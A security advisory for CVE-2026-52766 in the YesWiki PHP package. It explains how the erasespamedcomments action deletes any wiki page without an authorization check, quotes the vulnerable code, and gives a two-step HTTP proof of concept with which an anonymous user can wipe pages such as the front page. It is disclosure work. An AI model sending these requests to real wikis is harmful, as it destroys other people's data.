PT-2026-57027 · Packagist · Yeswiki/Yeswiki
Published
2026-07-09
·
Updated
2026-07-09
·
CVE-2026-52766
CVSS v3.1
9.1
Critical
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H |
Summary
The
{{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (default write acl='*') on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users.The action's
delete() callee is PageManager::deleteOrphaned(), which despite its name does not check whether the target page is orphaned: it issues an unconditional DELETE against pages, links, acls, triples, referrers, and tags tables.Details
Three issues compose the vulnerability.
actions/EraseSpamedCommentsAction.phpperforms no authorization check before processing$ POST['clean']/$ POST['suppr'][]inactions/EraseSpamedCommentsAction.php:
php
public function run()
{
$wiki = &$this->wiki;
ob start();
// ...
elseif (isset($ POST['clean'])) {
$deletedPages = '';
if (!empty($ POST['suppr'])) {
foreach ($ POST['suppr'] as $page) {
echo 'Effacement de : ' . $page . "<br />
";
if ($wiki->services->get(PageController::class)->delete($page)) {
$deletedPages .= $page . ', ';
}
}
}
}
}No
UserIsAdmin(), no UserIsOwner(), no HasAccess('write', $page) per-target check, no CSRF token check.- The default action ACL grants access to everyone in
includes/YesWiki.php:
php
$acl = empty($this->config['permissions'][$moduleType][$module])
? '*'
: $this->config['permissions'][$moduleType][$module];php
if ($acl === null) { return true; }
return $this->CheckACL($acl, $user);No shipped
permissions map gates erasespamedcomments to admins, so Performer::CheckModuleACL('erasespamedcomments', 'action') returns true for anonymous users.PageController::delete()andPageManager::deleteOrphaned()perform no authorization check and do not validate that the page is actually orphaned inincludes/controllers/PageController.php:38–48:
php
public function delete(string $tag): bool
{
if ($this->entryManager->isEntry($tag)) {
return $this->entryController->delete($tag);
} else {
$this->pageManager->deleteOrphaned($tag);
$this->wiki->LogAdministrativeAction(
$this->authController->getLoggedUserName(),
'Suppression de la page ->""' . $tag . '""'
);
return true;
}
}in
includes/services/PageManager.php:289–310:php
public function deleteOrphaned($tag)
{
if ($this->securityController->isWikiHibernated()) { throw new Exception( t('WIKI IN HIBERNATION')); }
unset($this->ownersCache[$tag]);
if (in array($tag, $this->pageCache)) { unset($this->pageCache[$tag]); }
$this->dbService->query("DELETE FROM ... WHERE tag='{$this->dbService->escape($tag)}' OR comment on='{$this->dbService->escape($tag)}'");
$this->dbService->query("DELETE FROM ...links... WHERE from tag='{$this->dbService->escape($tag)}' ");
$this->dbService->query("DELETE FROM ...acls... WHERE page tag='{$this->dbService->escape($tag)}' ");
// ...further unconditional DELETEs across triples, referrers, tags
}The companion
isOrphaned() method (line 284) exists but is never called from deleteOrphaned(). The function name is misleading as it deletes any page, not just orphans.PoC
Default fresh install where
default write acl='*' (per includes/YesWikiInit.php:219), anonymous browsing.- create a trigger page (anonymous)
http
POST /?wiki=SpamCleanup/edit HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded
body=%7B%7Berasespamedcomments%7D%7D&submit=1This succeeds because the new page passes
aclService->hasAccess('write', 'SpamCleanup') against default write acl='*'.- trigger arbitrary page deletion (anonymous)
http
POST /?wiki=SpamCleanup HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded
clean=yes&suppr%5B0%5D=PagePrincipale&suppr%5B1%5D=AnotherTargetPageServer response includes
Effacement de : PagePrincipale and Effacement de : AnotherTargetPage. pages, links, acls, triples, referrers, and tags rows for those tags are deleted from the database.Impact
Arbitrary page deletion, including the front page (
PagePrincipale).Fix
Missing Authorization
Incorrect Default Permissions
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Yeswiki/Yeswiki